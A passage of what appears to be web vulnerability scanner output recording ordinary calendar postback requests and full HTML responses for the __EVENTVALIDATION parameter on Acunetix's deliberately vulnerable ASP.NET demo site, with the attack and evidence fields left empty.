style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8222&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDASHjiXtoIZGRkbsmNLLGTKDb0We%2BMM23DZBgPfZM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIgc%2FXAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2ByNr2aFOW1IxFk8HMci5eZu4PLBA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:21 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDASHjiXtoIZGRkbsmNLLGTKDb0We+MM23DZBgPfZM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIgc/XAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+yNr2aFOW1IxFk8HMci5eZu4PLBA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:White" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8524&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBACYEyTNsIZGRkdfxxFM9pQ882cW7B7OXKKSPV1PU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIl6vbAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxQDnzo9tgxIvid5dPETdEkZm2Tl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:04 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBACYEyTNsIZGRkdfxxFM9pQ882cW7B7OXKKSPV1PU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIl6vbAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyAxQDnzo9tgxIvid5dPETdEkZm2Tl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:White" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> 